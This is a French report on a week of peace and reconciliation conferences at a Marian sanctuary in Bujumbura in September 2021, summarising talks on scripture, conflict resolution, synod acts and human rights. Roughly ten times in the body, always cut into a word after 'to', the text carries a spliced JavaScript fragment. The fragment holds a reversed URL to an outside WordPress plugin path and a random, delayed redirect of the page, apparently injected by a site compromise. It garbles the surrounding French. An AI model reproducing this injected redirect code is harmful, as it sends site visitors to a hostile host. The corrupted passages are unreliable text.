Le monde entier célèbre la journée internationale de la paix en date du 21 septembre de chaque année. Le sanctuaire de la Reine de la paix et réconciliation n’a pas manqué de se joindre aux autres défenseurs de la paix en organisant des conférences à l’intention du public intéressé. Lesdites conférences ont eu lieu du mardi 21 au vendredi 24 septembre de l’année en cours au centre Porta Sion, chaque fois de 18h à 19h30. Les thèmes qui ont été développés pour les quatre jours successifs sont énoncés ci-après, en même temps que les conférenciers du jour :

  • La Parole Dieu comme une lampe qui éclaire sur le chemin de la paix et la réconciliation’, présenté par le Père Herménégilde COYITUNGIYE, actuel Recteur du Sanctuaire de la Reine de la paix et réconciliation de Mont Sion Gikungu ;
  • Que dit la Bible à propos de la résolution des conflits’, présenté par l’Abbé Caliop BAZITWINSHI ;
  • Enseignement sur les Actes du Synode diocésain’, présenté par Monseigneur Anatole RUBERINYANGE, Vicaire Général de l’Archidiocèse de Bujumbura ;
  • ‘La contribution du croyant dans le respect du droit de l’homme’, présenté par monsieur Jérémie MANIRAKIZA.

La première conférence du mardi 21 septembre a été animée par le Père Herménégilde COYITUNGIYE. Il a d’abord salué les participants en leur souhaitant la bienvenue dans cet atelier et il leur a remercié pour avoir répondu présents au redevez-vous. Il leur a fait savoir que selon le calendrier de l’ONU, la journée mondiale pour la paix et la réconciliation a été votée le 21 septembre 1968, mais entre-temps, l’Eglise célèbre cette fête chaque 1 janvier de l’année. Pour cette année 2021, le Pape François interpelle tous les chrétiens à se relever pour bâtir un monde où on partage tout, un monde durable.

Le terme ‘Paix’ reçoit plusieurs connotations suivant les endroits et même les sources d’origine de cette terminologie. Selon Saint Augustin, et même le Pape pie XII affirment que la paix provient de Dieu. Saint Nicolas de Flue a été baptisé par le Pape Pie XII comme le proclamateur de la paix dans le monde. Nous, les chrétiens qui prions au jour le jour, sommes en droit de nous poser une question de savoir si nous œuvrons pour la paix ou si tout au moins nous la défentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons. Selon les chercheurs, le mot paix revient 374 fois dans la Bible.  A titre illustratif, nous pouvons nous référer aux versets suivants : Josué 9,15 ; Isaïe 32,7 ; Isaïe 26,3 ; Epitre de saint Paul aux Galates 5,22 ; Genèse 32 ; seconde Epitre de saint Paul aux 2 Corinthiens 5,19.  La paix est si importante dans notre vie, de telle sorte que nous recherchons la paix de la naissance à notre mort et de génération en génération.

Que dit la Bible à propos de la résolution des conflits ?

Le second jour des conférences a vu une participation légèrement supérieure de participants comparativement au premier jour, mais nous devons tout de même signaler que la participation pour tous les jours n’a pas été bonne du tout, si l’on toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit se référer aux prévisions des organisateurs des cérémonies. La conférence pour cette soirée a été animée par l’Abbé Caliop BAZITWINSHI qui a pris appui dans la première épitre de saint Paul aux Corinthiens (6, 6-7) qui nous invite à ne pas nous exposer devant la justice, car celle-ci peut trancher en notre défaveur et la punition ne tarde pas de tomber. Au cas où l’entente et la résolution pacifique ne sont pas possible, la Bible prévoit l’institution des personnes qui ont la charge de trancher des conflits (Exode, 19, 16-17). Dans tous les cas, il est à préciser que la référence juste et irréprochable dans en matière de justice est le Seigneur lui-même. Après lui viennent les juges, et les anciens de la cité. Ceux-ci ont toujours besoin des témoignages des juges tout en gardant à cœur le fait de faire des investigations pour plus de preuves avant de présenter la dernière sentence.

Enseignement sur les Actes du Synode diocésain

La conférence du 23 septembre a commencé par le discours d’accueil du Père Recteur du Sanctuaire marial de Mont Sion Gikungu pour l’invité d’honneur, le Vicaire Général de l’Archidiocèse de Bujumbura, Mgr Anatole.

Mgr Anatole a remercié les dirigeants du sanctuaire pour l’organisation de cette semaine de la paix et la réconciliation. Comme il l’a expliqué le dit synode avait pour but de réunir et débattre de toutes les questions qui hantent les chrétiens afin de prévoir une bonne réconciliation effective entre nous. Ce travail de collecte des questions a commencé en 2004 dans tous les diocèses, puis les sessions du synode ont débuté en 2012. Il a en outre souligné qu’il a eu d’autres synodes, comme par exemple ceux baptisés ‘La résurrection de l’Afrique’, en 2005 et La Pentecôte de l’Afrique, en 2011 qui avaient pour but d’étudier comment guérir l’Afrique de ses blessures intérieures causées par des guerres.

Les actes du synode contiennent les éléments suivants :

  • Les 16 propositions les plus importantes aux questions posées par les chrétiens ;
  • Les décisions prises de droits et de sensibilisation ;
  • Le plan stratégique du synode.

Les grandes propositions des actes du synode sont les suivantes :

  • Seule une église réconciliée peut aider les hommes à se réconcilier ;
  • Le voyage de la paix et de la réconciliation est important avec ses principes qui sont la Vérité, la Justice, l’Amour et le Partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don ;
  • Le pilier de la pastorale de la réconciliation ;
  • La justice réconciliatrice après un conflit violent ;
  • Le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don après la réconciliation d’un conflit violent ;
  • Le rapport entre la justice et le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don ;
  • Parler de ce que l’on a vécu dans les conflits violents ;
  • La place de la réparation dans la réconciliation ;
  • Les blessures intérieures et les moyens de les guérir ;
  • La nouvelle évangélisation ;
  • L’apostolat des petites communautés ecclésiales ;
  • La place des religions pour la paix et la réconciliation ;
  • La place de la gestion de l’église catholique dans la paix et la réconciliation ;
  • La place des prêtres dans la paix et la réconciliation ;
  • La place des religieux dans la paix et la réconciliation ;
  • La place des laïcs dans la réconciliation.

Les décisions prises pour sensibiliser les personnes à la paix et la réconciliation sont les suivantes :

  • Un chrétien adulte se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit d’avoir chez soi la sainte bible ;
  • Création du module de formation sur la réconciliation ;
  • La création des petites communautés ecclésiales,
  • Le but précis des petites communautés ecclésiales,
  • Sensibilisation à la célébration du Saint Sacrement de la réconciliation.

Après les enseignements de Monseigneur le Vicaire Général, il y a eu des échanges-débats sur les questions suivantes :

1 Qu’est ce qui est prévu pour que les petites communautés soient créées là où elles ne sont pas encore?

2 Où trouvera-t-on ces livres des actes du synode ?

3 Quand les actes de synodes seront mis en applications ?

4 comment vous prévoyez faire parvenir ces actes du synodes jusqu’ aux chrétiens qui sont les moins informés?

La contribution du croyant dans le respect du droit de l’homme

Le thème ci-haut mentionné a été développé par Monsieur par Jérémie MANIRAKIZA, c’était ce vendredi qui était le dernier jour dans la succession des conférences prévues pour les quatre jours de suite. Le chapitre 2 du livre de la Genèse (2, 26-27) nous montre le rôle de l’homme dans la sauvegarde des droits de l’homme. Il nait avec une conscience qui lui permet de porter son jugement sur ce qu’il fait et ce qui se fait autour de lui. Cette conscience qui invite toute personne à faire le bien et éviter le mal. Toute personne est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotée de la liberté et de la volonté, c’est – à -dire qu’elle est capable de choisir et de faire ce qu’elle veut, et no ce qui lui est dictée par d’autres. C’est dans cette ligne d’idées que la morale religieuse, culturelle et sociale trouve ses assises.

La Déclaration Universelle des Droits de l’Homme date du 10 décembre 1948, et elle stipule, en son article premier, que tous les hommes naissent libres et égaux. Nous comprenons par-là que personne n’a le droit de faire du mal à l’autre car la liberté de l’un toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit s’arrêter là où celle de l’autre commence. Cela est d’autant plus vrai que les Saintes Écritures ne cesse pas de nous dire que Dieu nous aime tous sans exceptions. Suite à ce message, des personnes animées de bonne foi ne cessent de réclamer l’application effective de la mise en œuvre des droits et la liberté de tous.  Comme chrétiens, nous ne devons pas perdre de vue la prière qui est notre bâton de pèlerin sur notre marche sur terre vers le royaume des cieux. De plus, les chrétiens toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent être des conseillers au sein de leur communauté locale, dans leurs églises et dans le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domaine de la gestion politiques de leurs patries.

Nous tenons à préciser que le programme des activités de chaque jour était similaire pour les quatre soirées : De 18h à 19h30. La clôture solennelle des activités de la semaine dédiée à la paix et la réconciliation a eu lieu le dimanche 26 courant dans les enceintes de Mont Sion.

Par NYANDWI M., MUNEZERO I. & NIMBONA F.